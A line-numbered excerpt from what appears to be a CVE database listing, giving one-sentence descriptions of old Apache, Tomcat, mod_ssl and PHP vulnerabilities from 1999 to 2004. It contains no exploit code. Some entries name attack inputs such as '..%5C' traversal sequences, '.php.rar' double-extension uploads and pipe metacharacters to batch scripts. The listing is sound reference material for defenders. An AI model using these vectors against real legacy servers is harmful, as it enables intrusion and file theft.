13556| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
13557| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
13558| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
13559| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
13560| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
13561| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
13562| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
13563| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
13564| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
13565| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
13566| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
13567| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
13568| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
13569| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
13570| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
13571| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
13572| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
13573| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
13574| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
13575| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
13576| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
13577| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
13578| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
13579| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
13580| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
13581| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
13582| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
13583| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
13584| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
13585| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
13586| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
13587| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
13588| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
13589| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
13590| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
13591| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
13592| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
13593| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
13594| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
13595| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
13596| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
13597| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
13598| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
13599| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
13600| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
13601| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
13602| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
13603| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
13604| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
13605| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
13606| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
13607| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
13608| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
13609| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
13610| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
13611| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
13612| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
13613| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
13614| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
13615| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
13616| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
13617| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
13618| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
13619| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
13620| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
13621| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
13622| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
13623| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
13624| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
13625| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
13626| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
13627| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
13628| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
13629| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
13630| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
13631| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
13632| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
13633| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
13634| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
13635| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
13636| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
13637| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
13638| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
13639| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
13640| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
13641| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
13642| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
13643| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
13644| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
13645| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
13646| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
13647| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
13648| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
13649| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
13650| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
13651| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
13652| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
13653| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
13654| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
13655| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
13656| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
13657| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
13658| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
13659| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
13660| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
13661| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
13662| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
13663| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
13664| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
13665| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
13666| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
13667| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
13668| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
13669| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
13670| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
13671| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
13672| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
13673| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
13674| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
13675| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
13676| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
13677| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
13678| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
13679| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
13680| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
13681| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
13682| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
13683| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
13684| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
13685| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
13686| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
13687| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
13688| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
13689| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
13690| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
13691| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
13692| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
13693| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
13694| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
13695| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
13696| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
13697| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
13698| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
13699| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
13700| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
13701| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
13702| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
13703| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
13704| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
13705|
